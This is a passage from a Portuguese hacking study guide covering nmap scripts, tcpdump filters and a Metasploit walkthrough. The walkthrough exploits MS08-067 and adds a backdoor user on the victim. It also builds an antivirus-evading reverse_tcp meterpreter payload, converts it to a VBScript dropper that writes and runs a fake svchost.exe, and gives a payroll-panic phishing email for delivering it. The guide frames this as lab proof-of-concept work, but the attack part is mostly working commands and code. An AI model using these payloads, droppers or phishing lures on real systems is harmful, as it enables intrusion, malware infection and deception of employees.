GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Sends an ICMPv6 echo request packet to the all-nodes
link-local multicast address (<code>ff02::1</code>) to
discover responsive hosts on a LAN without needing to
individually ping each IPv6 address.
@usage
./nmap -6 --script=targets-ipv6-multicast-echo.nse --script-args
'newtargets,interface=eth0' -sL

description = Sends an ICMPv6 packet with an invalid extension


header to the all-nodes link-local multicast address
(<code>ff02::1</code>) to discover (some) available
hosts on the LAN. This works because some hosts will
respond to this probe with an ICMPv6 Parameter Problem
packet.
@usage
./nmap -6 --script=targets-ipv6-multicast-invalid-dst.nse --scriptargs 'newtargets,interface=eth0' -sP

description = Attempts to discover available IPv6 hosts on the LAN


by sending an MLD (multicast listener discovery) query
to the link-local multicast address (ff02::1) and listening
for any responses. The query's maximum response delay
set to 0 to provoke hosts to respond immediately rather
than waiting for other responses from their multicast
group.

www.clubedohacker.com.br

334

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args
'newtargets,interface=eth0' -sP

description = Performs IPv6 host discovery by triggering stateless


address auto-configuration (SLAAC).
http://dev.metasploit.com/redmine/projects/framework/repository/cha
nges/modules/auxiliary/scanner/discovery/ipv6_neighbor
_router_advertisement.rb
@usage
./nmap

-6
--script=slaac_host_discovery.nse
'newtargets,interface=eth0' -sP

--script-args

description = Sniffs the local network for a configurable amount of


time (10 seconds by default) and prints discovered
addresses. If the <code>newtargets</code> script
argument is set, discovered addresses are added to the
scan queue.
@usage
nmap

-sL
--script=targets-sniffer
--scriptargs=newtargets,targets-sniffer.timeout=5s,targetssniffer.iface=eth0

-- @args targets-sniffer.timeout The amount of time to listen for


packets. Default <code>10s</code>.

www.clubedohacker.com.br

335

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-- @args targets-sniffer.iface The interface to use for sniffing.
-- @args newtargets If true, add discovered targets to the scan
queue.

description = Inserts traceroute hops into the Nmap scanning queue.


It only functions if Nmap's <code>--traceroute</code>
option is used and the <code>newtargets</code> script
argument is given.
@usage
nmap --script targets-traceroute --script-args newtargets -traceroute target

description = Determines whether the encryption option is supported


on a remote telnet server. Some systems (including
FreeBSD and the krb5 telnetd available in many Linux
distributions) implement this option incorrectly, leading to
a remote root vulnerability. This script currently only tests
whether encryption is supported, not for that particular
vulnerability.
@usage
nmap -p 23 <ip> --script telnet-encryption

description = Enumerates TFTP (trivial file transfer protocol)


filenames by testing for a list of common ones.

www.clubedohacker.com.br

336

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -sU -p 69 --script tftp-enum.nse --script-args="tftpenum.filelist=customlist.txt" <host>

description = Enumerates a TLS server's supported protocols by using


the next protocol negotiation extension.
@usage
nmap --script=tls-nextprotoneg <targets>

description = Lists the geographic locations of each hop in a


traceroute and optionally saves the results to a KML file,
plottable on Google earth and maps.
@usage
nmap --traceroute --script traceroute-geolocation

description = Compares the detected service on a port against the


expected service for that port number (e.g. ssh on 22, http
on 80) and reports deviations. The script requires that a
version scan has been run in order to be able to discover
what service is actually running on each port.
@usage
nmap --script unusual-port <ip>

www.clubedohacker.com.br

337

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description= Sniffs an interface for HTTP traffic and dumps any
URLs, and their originating IP address. Script output
differs from other script as URLs are written to stdout
directly. There is also an option to log the results to file.
@usage
nmap --script url-snarf -e <interface>

description = Extracts information, including file paths, version and


database names from a Versant object database.
@usage
nmap -p 5019 <ip> --script versant-info

description = Performs brute force password auditing against the


VMWare Authentication Daemon (vmware-authd).
@usage
nmap -p 902 <ip> --script vmauthd-brute

description = Performs brute force password auditing against VNC


servers.
@usage
nmap --script vnc-brute -p 5900 <host>

www.clubedohacker.com.br

338

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves cluster and store information from the
Voldemort distributed key-value store using the
Voldemort Native Protocol.
@usage
nmap -p 6666 --script voldemort-info <ip>

description = Retrieves some basic information, including protocol


version from a Vuze filesharing node.
@usage
nmap -sU -p <port> <ip> --script vuze-dht-info -sV

description = Detects vulnerabilities and gathers information (such as


version
numbers and hardware support) from VxWorks Wind DeBug agents.
@usage
nmap -sU -p 17185 --script wdb-version <target>

description = Queries the WHOIS services of Regional Internet


Registries (RIR) and attempts to retrieve information
about the IP Address Assignment which contains the
Target IP Address.

www.clubedohacker.com.br

339

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
# Basic usage: nmap target --script whois

description = Retrieves and displays information from devices


supporting the Web Services Dynamic Discovery (WSDiscovery) protocol. It also attempts to locate any
published Windows Communication Framework (WCF)
web services (.NET 4.0 or later).
@usage
sudo ./nmap --script broadcast-wsdd-discover

description = Requests an XDMCP (X display manager control


protocol) session and lists supported authentication and
authorization mechanisms.
@usage
nmap -sU -p 177 --script xdmcp-discover <ip>

description = Performs brute force password auditing against XMPP


(Jabber) instant messaging servers.
@usage
nmap -p 5222 --script xmpp-brute <host>

www.clubedohacker.com.br

340

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
TCPDump
O tcpdump uma ferramenta muito utilizada para monitorar os
pacotes trafegados numa rede de computadores. Ela mostra os
cabealhos dos pacotes que passam pela interface de rede especificada,
obedecendo as opes de configuraes desejada. Vejamos abaixo
algumas opes de utilizao dessa maravilhosa ferramenta.

Opes
#tcpdump -i eth0

www.clubedohacker.com.br

341

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Com o comando: # tcpdump -nn -ni eth0 host 192.168.0.100 podese fazer filtro de captura por host.
Mias se desejarmos apenas os pacotes destinados ao host
192.168.0.100 bastaria incluir o src: Exemplo: # tcpdump -nn -ni
eth0 src host 192.168.0.100
Para capturar de forma inversa ao exposto anteriormente ou seja,
capturar pacotes destinado a o host 192.168.0.100 o comando seria: #
tcpdump -nn -ni eth0 dst host 192.168.0.100
Pode-se tambm ser mais especficos (usando, dst port e src port)
podendo especificar portas por exemplo. Para capturar pacotes
originados no host 192.168.0.100 com destino porta 80 de qualquer
outro host o comando seria: # tcpdump -nn -ni eth0 src host
192.168.0.100 and dst port 80

www.clubedohacker.com.br

342

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
No exemplo anterior utiliza-se dos operadores lgicos (and, or). Onde
o and faz com que o TCPDump s capture os pacotes onde ambas
as condies forem verdadeiras (o pacote deve ter sado de
192.168.0.100 e ter como destino a porta 80). Utilizando-se o or,
qualquer pacote onde pelo menos uma das duas condies forem
verdadeiras ser considerado como verdadeiro e os pacotes sero
capturados. Ex: # tcpdump -nn -ni eth0 src host 192.168.0.100 or dst
port 80
Se desejar especificar um host o efeito ser o mesmo. Por exemplo, o
comando a seguir vai capturar qualquer pacote que envolva os hosts
192.168.0.100 ou 192.168.0.110 # tcpdump -nn -ni eth0 host
192.168.0.100 or host 192.168.1.110
Pode-se tambm utilizar nomes de domnio para capturar pacotes
# tcpdump -i eth0 dst host www.clubedohacker.com.br
Tambm possvel negar um host, excluindo apenas os hosts que
voc especificar da captura. # tcpdump -nn -ni eth0 not host
192.168.0.110 - Nesse caso o tcpdump no ir capturar nenhum
pacote que se relacione com o host 192.168.0.110, mas ir capturar
todo o resto j que no foi adicionado nenhum outro filtro.

www.clubedohacker.com.br

343

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Utiliza-se a flag -w para gravar o resultado em um determinado
arquivo: # tcpdump -nn -ni eth0 not host 192.168.0.110 -w
/home/arquivo.pcap
Se desejar visualizar o contedo dos pacotes, utiliza-se a opo -r do
TCPDump: # tcpdump -r /home/arquivo.pcap
Metasploit Framework

Muitos analistas utilizam ferramentas das mais diversas e o


backtrack "tema principal dessa obra oferece mais de 300 opes das
quais o Metasploit tem destaque". O Metasploit perfeito para o que
chamamos de prova de conceito, ou seja, a explorao de
vulnerabilidades quando voc tem quem invadir pra documentar e
provar na pratica que tal sistema est vulnervel.

www.clubedohacker.com.br

344

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Metasploit fornece informaes e ferramentas teis para
analistas de vulnerabilidades , tambm fornece o maior conjunto de
exploits j prontos para prova de conceito.
Os pesquisadores de segurana, e os desenvolvedores o utilizam
exaustivamente. O Metasploit tambm ajuda e muito no dia a dia de
quem trabalha com IDS. O Metasploit um projeto open source e est
inserido no Backtrack como j mencionei acima. Esse framework
realmente algo maravilhoso com grande poder de crescimento.
Informaes completas podem ser obtidas no site oficial
http://www.metasploit.com/
Vale ressaltar que no se trata de uma obra sobre metasploit,
portanto, passaremos alguns conceitos e como utiliz-lo apenas com o
objetivo de fazer nossas provas de conceito em determinadas tcnicas
de ataque.
Comandos teis no metasploit
Vamos direto ao assunto: Para se utilizar o metasploit
necessrio conhecer alguns comandos bsicos de manipulao de
exploit, payloads etc. vamos as eles:

www.clubedohacker.com.br

345

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Comando show: H uma srie de comandos show que voc pode
usar, mas os que voc ir usar mais freqentemente so show options
show auxiliary, show exploits e show payloads.
Pode ocorrer de voc esta dentro de um modulo do metasploit e ter
duvidas de qual sistema operacional seria vulnervel a ele, nesses
casos voc pode recorrer ao comando show targets de dentro do
mdulo que ele vai te informar quais sistemas alvo seriam suportados.
Voc pode utilizar o comando show se deseja fazer mais alguns
ajustes em determinado modulo de exploit, pra isso basta executar o
comando show advanced.
Comando use: Assim que voc souber qual exploit vai usar, utilize o
comando use para selecionar o exploit de dentro da shell do
metasploit. Exemplo: use exploit/xx/xx/xxxxxxxxx
Comando info: O comando info ir fornecer informaes
detalhadas sobre um determinado mdulo especial, incluindo todas as
opes, os alvos, e outras informaes. Tambm deve ser utilizado de
dentro do modulo.
Comando connect: Ao digitar o comando "connect" com um
endereo IP e o nmero da porta, voc pode se conectar a um servidor
remoto de dentro da console do metsploit da mesma forma que voc
faria se estivesse utilizando o netcat ou o telnet.

www.clubedohacker.com.br

346

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Comando search: O comando search utilizado para busca geral
dentro de mdulos e fora dele.
Comando set: O comando set usado para configurar as opes e
configuraes do mdulo que voc estiver trabalhando atualmente.
Seja um exploit, payload etc.
Comando check: Alguns exploits, mas s alguns suportam esse
comando, ele vai verificar se o alvo vulnervel a um exploit em
particular. Isso interessante pois ele faz o mesmo papel que fazem
os scripts do nmap.
Comando back: Sempre que voc terminar uma tarefa e desejar para
aquele modulo retrocedendo ou tenha selecionado por enganos um
determinado mdulo, voc pode digitar o comando back e mover-se
para fora do contexto atual.
Para ter acesso ao metasploit bem simples, aqui estou
utilizando backtrak, mas pra quem utiliza Windows mais simples,
basta instalar o metasploit que voc vai baixando site oficial e clicar
duas vezes no cone correspondente.
Em meu site www.clubedohacker.com.br eu tenho uma seo
onde tiro duvidas sobre essa obra.

www.clubedohacker.com.br

347

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Praticando com o Metasploit.

Entrando no diretrio do framework iremos encontrar diversas


consoles e outras opes, algumas iremos trabalhar aqui e vamos
explicando passo a passo. Nesse momento iremos utilizar a console
msfconsole que totalmente em Shell, sem nenhum ambiente grfico,
assim podemos explorar melhor os recursos sem o inconveniente do
mouse ou telas adicionais. Nosso comando agora ./msfconsole para
carregar nossa Shell.

www.clubedohacker.com.br

348

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Temos aqui a nossa primeira Shell metasploit, a partir daqui


que faremos nossas provas de conceito. Nessa tela podemos observar
a quantidade de exploits, de payloads, auxiliares e outros. Mas o que
significa tudo isso?
Exploits: Define que tipo de ataques voc vai usar para explorar
determinada vulnerabilidade. Os exploits so configurados atravs de
diversas opes que devem ser definidas antes de ser utilizado. -Alguns
exploits fazem uso de cargas (payloads) e aqueles que no faz uso de
cargas so definidos como mdulos auxiliares.
Payloads, Encoders, NOPS : Payloads so os cdigos que voc
vai executar remotamente no sistema de destino.

www.clubedohacker.com.br

349

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Os Payloads so executados atravs de um codificador para garantir
que no ocorram erros de transmisso. Os nops mantm o tamanhos
das cargas consistente.
Na prtica funciona assim: Voc configura um exploit e injeta
nele um payload. O exploit ir explorar a vulnerabilidade do sistema
remoto e vai levar consigo uma carga ou seja, o payload. A partir da o
payload assume a tarefa de execuo dos comandos arbitrrios na
maquina da vitima.
Auxiliary: O Metasploit traz consigo centenas de mdulos
auxiliares tais como, Scanners, Snifferse vrios outros mdulos,
inclusive para ataques de negao de servio. Esses mdulos so
chamados de mdulos auxiliares e so muito teis em seu dia a dia de
analista de vulnerabilidades.
Suporte a comandos externos: Execuo de comandos externos
no msfconsole possvel, por exemplo voc pode digitar o comando
ping e ou outros sem precisar sair da console.
Invadindo com exploit
Aps o entendimento bsico sobre o framework, podemos
realizar nossas tarefas, configurar nossos exploits e fazer as provas de
conceito com base nas vulnerabilidades encontradas.
Pra comear vamos explora vulnerabilidade encontrada o nmap
ms08_067. Uma vulnerabilidade muito antiga do sistema Microsoft,
mais o que mais importante aqui ensinar como configurar um
exploit, um payload e explorar uma vulnerabilidade.

www.clubedohacker.com.br

350

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Nesse exemplo foi digitado no metasploit o comando use


exploit/Windows/smb/ms08_67_netatapi e com um enter foi
selecionado o modulo. Depois foi digitado o comando show options e
foi mostrado as opes de variveis que precisam ser setada dentro do
modulo.

www.clubedohacker.com.br

351

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

www.clubedohacker.com.br

352

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Aqui utilizamos o comando set RHOST 192.168.0.14 pra setar a
varivel host remoto, ou maquina alvo.

Essa tela confirma que nosso comendo foi aceito. Agora devemos
injetar a carga, (payload). Utilizaremos o mesmo comando set, s que
agora apontando para um payload de conexo reversa.

www.clubedohacker.com.br

353

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Nosso comando foi aceito tambm. Agora vamos configurar o


payload.

www.clubedohacker.com.br

354

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Atravs do comando show options descobrimos que agora precisamos


configurar a varivel LHOST que nada mais que minha maquina
local. A maquina que recebera a conexo da vitima. Iremos utilizar o

www.clubedohacker.com.br

355

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
comando set LHOST 192.168.0.12 que o meu IP.

www.clubedohacker.com.br

356

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Todos os comandos foram aceitos e o modulo esta configura, pronto
para uso. O comando final agora exploit e o que faremos agora.

Com o comando exploit iremos disparar o ataque.

www.clubedohacker.com.br

357

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O ataque foi executado com sucesso e ganhamos uma Shell


meterpreter, agora s migrar pra dentro do Windows na mquina da

www.clubedohacker.com.br

358

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
vitima. Para isso basta digitar o comando Shell.

Aps o comando Shell e teclando enter, ns temos um prompt


cmd.exe do Windows. A partir daqui podemos executar qualquer
comando, inclusive instalar programas, como vrus, backdoors e
outros.

www.clubedohacker.com.br

359

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Para provar isso vamos migrar pra raiz do sistema com o comando cd\

www.clubedohacker.com.br

360

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Pronto! Usando o comando net users visualizamos as contas dos


usurios na maquina da vitima.

www.clubedohacker.com.br

361

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Podemos criar um novo usurio, assim quando precisar retornar, j


teremos um usurio pra logar.

www.clubedohacker.com.br

362

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Com o comando net user sifu 123 ADD eu criei um novo usurio
chamado sifu com a senha 123 na mquina da vitima.

Pronto! Aqui est o usurio criado e pronto para uso.


Ataque do lado do cliente!
Com o Metasploit voc pode tambm disparar ataques do lado
do cliente utilizando engenharia social.

Vamos fazer agora uma demonstrao desse tipo de ataque.

Iremos criar um payload usando o codificador shikata_ga_nai


polimrfico com metasploit.

Depois de criado ser gerado um executvel para conectar de

volta em sua mquina atravs de conexo reversa pela porta 8080.

www.clubedohacker.com.br

363

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aps a criao do executvel iremos convert-lo num vbscript

para que voc possa explorar atravs do word. Aps a concluso de


todo esse processo iremos fazer uma demonstrao de invaso com
tudo funcionando. Considerando que algum na empresa tenha aberto
o arquivo.
Lembre-se: Um analista de vulnerabilidades nunca desiste e a
tcnica que ser apresentada aqui infalvel se bem executada, j que
no esta relacionada a nenhum sistema operacional, mas sim a
aplicao e o ser humano usurio do sistema.
Ns chamamos de ataque do lado do cliente porque esse tipo de
ataque usa as pessoas como alvo principal. Imagine voc esta na
empresa trabalhando normalmente e recebe um e-mail da
contabilidade com o seguinte texto.
Prezados colaboradores, nosso sistema de controle de folha de
pagamento foi infectado com um vrus que ainda no sabemos qual.
J chamamos o suporte de informtica pra ver se consegue resolver,
no entanto hoje dia 26 e precisamos fechar a folha de pagamento
at o dia 30 sob pena de no ser possvel a liberao dos salrios no
5.o dia til.
Para que possamos nos antecipado, resolvemos recadastrar todos os
funcionrios, portanto, voc deve imprimir esse documento e

www.clubedohacker.com.br

364

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
entregar no setor responsvel pela folha de pagamento para que
possamos providenciar o recadastro.
Atenciosamente,
Ax7d45eh da silva
Essa uma tcnica antiga e chamada de engenharia social.
Nesse caso utiliza-se o pnico, o medo das pessoas no conseguir
receber seus salrios na data certa far com que muitas pessoas clique
num arquivo pdf ou doc ou qualquer outro que voc enviar e quando
o primeiro chegar no setor com o papel impresso ira descobrir que
no houve nenhum problema e tudo esta na mais perfeita ordem.
claro que isso em algumas empresas vai gerar muitos
comentrios e a rea de informtica vai agir. A questo quando isso
acontecer voc j entrou e saiu sem que ningum percebesse. Nenhum
antivrus ou sistema de proteo.
Vamos fazer uma demonstrao agora de como se faz analise de
vulnerabilidades usando o lado mais fraco. O ser humano usurio da
estao de trabalho.

www.clubedohacker.com.br

365

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Gerando um VBScript e injetando a carga "payload"
Para essa tarefa voc pode usar o metasploit para infectar um
documento do Word do Excel ou um arquivo pdf como um livro por
exemplo com payloads.
Voc tambm pode usar seus prprio payloads customizados se
desejar, pois nesse caso no obrigatrio que seja um payload
Metasploit.
Este mtodo til quando no se consegue sucesso com os
ataque tradicionais pois se trata de um ataque do lado do cliente.
fundamental tambm quando se quer burlar um antivrus ou outro
sistema de proteo.
Primeiro devemos criar nosso VBScript e configurar um ouvinte
no metasploit.
root@bt:/pentest/exploits/framework3#./msfpayload
windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8080
ENCODING=shikata_ga_nai x >payload.exe

www.clubedohacker.com.br

366

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Com esse comando iremos criar um payload com o nome payload.exe


e injetar a carga reverse_tcp nele. Isso far com que qualquer mquina
que venha abrir esse arquivo procure por voc atravs de uma conexo
reversa. Isso significa que voc no ira invadir a maquina remota, pelo
contrrio. Ela vai se conectar com voc. Seu trabalho ser apenas
deixar sua maquina escutando na mesma porta 8080.
A escolha dessa porta se dar por motivos bvios. Normalmente
ela esta sendo filtrada pelos firewalls quando se refere a entrada de
pacotes, mas no para a sada.

www.clubedohacker.com.br

367

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O comando foi aceito e o payload foi criado.


Uma observao importante: Sabemos que com essa extenso
.exe nenhum antivrus, mesmo o mais fraco vai deixar passar esse
arquivo. Ento teremos que trabalhar ele e testar.
Vamos move-lo para o nosso diretrio tools que fica dentro do
diretrio framework.
root@bt4:#mv payload.exe /pentest/exploits/framework/tools/
root@bt: #cd /pentest/exploit/framework/ tools/
Entramos no diretrio tools e confirmamos que foi movido.

www.clubedohacker.com.br

368

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O prximo passo converte-lo em um vbscript


root@bt:/pentest/exploit/framework/tools# ruby exe2vbs.rb
payload.exe payload.vbs
Com o comando acima vamos converter nosso payload num
inofensivo vbscript e testar com alguns antivrus.

www.clubedohacker.com.br

369

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Como podemos ver pela imagem, a converso foi feita com sucesso.
root@bt:/pentest/exploit/framework/tools#cd ..
com o comando cd .. iremos voltar um diretrio.
Vamos recapitular: Ns criamos o nosso payload usando o
codificador shikata_ga_nai polimrfico que se transformou em um
executvel, para se conectar atravs de uma conexo reversa em nossa
maquina com o IP 192.168.0.12 pela porta 8080. Em seguida,
convertemos para um VBScript usando o script exe2vbs.rb na seo
de ferramentas "tools".
Agora j est completo, veja o resultado do script abaixo.
Function HPrYzuXz()
EuQGd=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0
)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Ch
r(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Ch
r(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr
(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0
)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&

www.clubedohacker.com.br

370

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&
Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&C
hr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Ch
r(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&
Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(3
2)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Ch
r(32)&Chr(98)&Chr(
EuQGd=EuQGd&Chr(98)&Chr(0)
Dim eMmJpwSfyQrrKoA
Set eMmJpwSfyQrrKoA =
CreateObject("Scripting.FileSystemObject")
Dim pgNtYwASMJUn
Dim IdcqlfVALIUUrTr
Dim mzTrhWSeUcj
Dim vnoRFmdcaOs
Set IdcqlfVALIUUrTr = eMmJpwSfyQrrKoA.GetSpecialFolder(2)
vnoRFmdcaOs = IdcqlfVALIUUrTr & "\" &
eMmJpwSfyQrrKoA.GetTempName()
eMmJpwSfyQrrKoA.CreateFolder(vnoRFmdcaOs)
mzTrhWSeUcj = vnoRFmdcaOs & "\" & "svchost.exe"
Set pgNtYwASMJUn =
eMmJpwSfyQrrKoA.CreateTextFile(mzTrhWSeUcj,2,0)
pgNtYwASMJUn.Write EuQGd
pgNtYwASMJUn.Close
Dim DASaEXZNGN
Set DASaEXZNGN = CreateObject("Wscript.Shell")
DASaEXZNGN.run mzTrhWSeUcj, 0, true
eMmJpwSfyQrrKoA.DeleteFile(mzTrhWSeUcj)
eMmJpwSfyQrrKoA.DeleteFolder(vnoRFmdcaOs)
End Function
HPrYzuXz

www.clubedohacker.com.br

371

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Na verdade o cdigo gerado enorme, com varias paginas. Eu
recortei aqui e deixei apenas o inicio e final do cdigo por questo de
espao, mas voc pode gerar o seu e ver o tamanho que vai ficar.
Agora voc deve enviar para a mquina vitima e aguardar a conexo de
acordo com o planejado, mais pra isso sua mquina deve est
escutando conexes na mesma porta "8080"
Para que isso acontea voc ter que configurar sua mquina
nesse sentido. root@bt:/pentest/exploit/framework#./msfcli | grep
multi/handler
Com o comando acima voc ir habilitar o e depois poder manipular
portas.

O primeiro comando foi aceito e a maquina est apta a manipular a


porta com o payload criado e o proximo passo colocar a mquina em
escuta.
root@bt:/pentest/exploit/framework#./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp
ENCODING=shikata_ga_nai LPORT=8080 LHOST=192.168.0.12 E.

www.clubedohacker.com.br

372

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Nessa tela pode-se ver o comando em execuo e a mquina escutando


na porta solicitada "8080".

Todos os comando foram aceitos e a mquina est escutando as


conexes de entrada na porta 8080. Ai s aguardar o que alguma
vitima clique no arquivo.

www.clubedohacker.com.br

373

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui o primeiro sistema aparecendo.


uma maquina minha instalada em meu laboratrio de testes que
esta utilizando o Windows 7. Ultima verso e com todos os patches
instalados conforme pode ser comprovado nas prximas telas.

www.clubedohacker.com.br

374

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Aqui j com acesso a maquina e com os mesmos poderes do usurio
logado, dentro do mesmo diretrio onde se alojou o script.

Dependendo do tipo de comando que voc vai executando voc


pode determinar o nvel da conta do usurio e consequentemente suas
permisses dentro do sistema.

www.clubedohacker.com.br

375

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

pronto. aqui voc j est na raiz do sistema remoto.

Aqui nessa tela pode-se ver a lista de diretrios existentes na maquina


remota.
Existem mais de uma centena de formas de se disparar um ataque
a determinado alvo com Metasploit, isso depende principalmente da
motivao e dos resultados que se espera. S no metasploit so mais de

www.clubedohacker.com.br

376

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
900 exploits e mais de 250 payloads, alem do mais voc tem como
criar seus prprios payload.
Armitage
O Backtrack traz em seu conjunto uma ferramenta excelente para
quem trabalha com o metasploit, o nome dessa nova opo Armitage.
Com uma interface grfica amigvel ela tem o objetivo de facilitar a
vida de quem utiliza Metasploit e no deseja permanecer em linha de
comando. At mesmo quem no tem muito conhecimento em analise de
vulnerabilidades conseguir bons resultados.

www.clubedohacker.com.br

377

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Armitage esta disponvel para downloads no repositrio do Backtrack,
e pode ser baixado e instalado atravs do comando "aptitude ou apt-get
install armitage" no backtrack 5 j vem instalado.

De dentro do framework basta digitar #armitage e mandar conectar

www.clubedohacker.com.br

378

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Ele levar um tempinho para carregar, da mesma forma que na linha


de comandos quando voc digita ./msfconsole

www.clubedohacker.com.br

379

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Para se fazer uma varredura super simples, basta escolher a
ferramenta, selecionar a ao que deseja e mandar executar "Launch" e
pronto, s aguardar um alguns instantes para que a varredura se
complete.

As configuraes de RHOSTS, RHOST, LHOST Payload etc.


seguem o mesmo procedimento da linha de comandos, a diferena a
facilidade de se utilizar uma "GUI" e poder fazer quase tudo com alguns
cliques do mouse.
Como pode-se observar, o Armitage proporciona uma excelente
interface para o Metasploit que pode vir a economizar muito tempo na
maioria dos casos.

www.clubedohacker.com.br

380

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
httsquash
Essa uma ferramenta de scanner HTTP e HTTPS muito
eficiente.

Opes disponiveis
-r Intervalo de endereos IP ou nome DNS de destino. Exemplos:
208.67.1.1-254, 2001 :: 1428:57 ab-6344, google.com)
-p Porta (padro 80)
Opes extras:
-t Tempo em segundos (o padro )
-b Apresentao das respostas (dados html)

www.clubedohacker.com.br

381

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
